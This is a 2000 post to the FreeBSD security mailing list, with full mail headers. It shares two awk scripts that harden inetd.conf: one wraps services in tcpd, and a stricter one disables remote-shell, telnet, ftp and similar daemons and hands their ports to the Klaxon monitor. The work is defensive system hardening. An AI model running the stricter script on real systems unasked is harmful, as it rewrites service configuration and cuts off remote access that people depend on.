passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda11089; Sat Sep 16 09:32:25 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id JAA71830 for ; Sat, 16 Sep 2000 09:32:25 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdz71827; Sat Sep 16 09:32:16 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.0/8.9.1) id e8GGWGO42682 for ; Sat, 16 Sep 2000 09:32:16 -0700 (PDT) Message-Id: <200009161632.e8GGWGO42682@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdK42677; Sat Sep 16 09:31:42 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1-RELEASE X-Sender: cy To: freebsd-security@freebsd.org Subject: Option 3 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sat, 16 Sep 2000 09:31:41 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org A blind carbon copy of this note has been sent to freebsd-arch for those who have subscribed to freebsd-arch and are not subscribed to freebsd-security. Here is the script I eluded to in Option 3 in the freebsd-arch discussion about Rsh/Rlogin/Rcmd & friends. I've used various forms of this script for over 7 years on various UNIX platforms. Use it and modify it as you see fit. It uses Klaxon, a port monitor, to replace and monitor disabled services. You can disable the service without the use of Klaxon. Enclosed are two versions of the script, a civilized version and a Draconian version. Version 1: #!/usr/bin/awk -f $1 !~ /^#/ && $6 != "internal" && $6 !~ /tcpd/ && $6 ~ /sbin/ && $7 !~ /identd/ {print "#==# " $0; print $1 "\t" $2 "\t" $3 "\t" $4 "\t" $5 "\t/usr/local/etc/tcpd\t" $7 "\t" $8 " " $9} $1 !~ /^#/ && $6 != "internal" && $6 !~ /tcpd/ && $6 !~ /sbin/ && $7 !~ /identd/ {print "#==# " $0; print $1 "\t" $2 "\t" $3 "\t" $4 "\t" $5 "\t/usr/local/etc/tcpd\t" $6 "\t" $8 " " $9} $1 != "time" && $6 == "internal" {print "#==# " $0} $1 == "time" {print $0} $1 ~ /^#/ || $6 ~ /tcpd/ || $7 ~ /identd/ {print $0} Version 2: #!/usr/bin/awk -f $1 !~ /^#/ && $6 != "internal" && $6 !~ /tcpd/ && ( $6 ~ /ftpd/ || $6 ~ /telnetd/ || $6 ~ /rshd/ || $6 ~ /rlogind/ || $6 ~ /rexecd/ || $6 ~ /uucpd/ || $6 ~ /fingerd/ || $6 ~ /tftpd/ || $6 ~ /talkd/ || $6 ~ /rstatd/ || $6 ~ /rusersd/ || $6 ~ /walld/ || $6 ~ /bootps/ || $6 ~ /bootpd/ ) {print "#==# " $0; print $1 "\t" $2 "\t" $3 "\t" $4 "\t" $5 "\t/usr/local/libexec/klaxon.i dent\tklaxon " $1} $1 !~ /^#/ && $6 != "internal" && $6 !~ /tcpd/ && $6 ~ /sbin/ {print "#==# " $0; print $1 "\t" $2 "\t" $3 "\t" $4 "\t" $5 "\t/usr/local/etc/tcpd\t" $7 "\t" $8 " " $9} $1 !~ /^#/ && $6 != "internal" && $6 !~ /tcpd/ && $6 !~ /sbin/ {print "#==# " $0; print $1 "\t" $2 "\t" $3 "\t" $4 "\t" $5 "\t/usr/local/etc/tcpd\t" $6 "\t" $8 " " $9} $1 !~ /^#/ && $6 == "internal" {print "#==# " $0; print $1 "\t" $2 "\t" $3 "\t" $4 "\t" $5 "\t/usr/local/libexec/klaxon.i dent\tklaxon " $1} $1 ~ /^#/ || $6 ~ /tcpd/ {print $0} Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message